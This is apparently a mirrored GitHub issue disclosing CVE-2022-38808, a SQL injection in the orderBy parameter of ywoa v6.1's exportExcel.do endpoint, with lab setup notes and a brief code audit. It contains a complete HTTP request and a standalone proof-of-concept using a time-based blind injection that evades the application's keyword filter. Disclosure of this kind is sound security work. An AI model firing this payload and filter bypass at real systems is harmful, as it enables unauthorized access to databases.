Headline

CVE-2022-38808: SQL injection exists in ywoa v6.1 backend/oa/visual/exportExcel.do interface · Issue #26 · cloudwebsoft/ywoa

ywoa v6.1 is vulnerable to SQL Injection via backend/oa/visual/exportExcel.do interface.

2 years ago

#sql #vulnerability #web #mac #js #git #intel #c++#auth #firefox

Environment construction

http://partner.yimihome.com/static/index.html#/index/sys_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

idea

Download: http://partner.yimihome.com/static/index.html#/index/idea_deploy First set it up as shown here, after setting it up, import the database, after importing, you need to change the link configuration yimioa/c-core/src/main/ resources/application.properties Modify the mysql connection information, and then just start But idea start, more bugs, and report more errors, here is idea static look at the code

/oa/visual/exportExcel.do interface orderby injection Bypass****Vulnerability recurrence

GET /oa/visual/exportExcel.do?code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&op=1&sort=desc&isMine=true HTTP/1.1 Host: 172.16.140.186:8088 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=339C404636300F5F43B74EC828919D11; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl

bypass poc

%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)

Code audit and function implementation

Did not find the corresponding web function point, here is a direct look at the static code interface audit

orderby, here the parameters, and then look down, because the above personnel function point that GET injection already know getModuleListSqlAndUrlStr method, so look down, directly orderby passed in
So it causes SQL injection, if not bypass, there will be no problem, after all, the filter method has been bypassed.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

12 months ago

12 months ago

12 months ago

12 months ago

12 months ago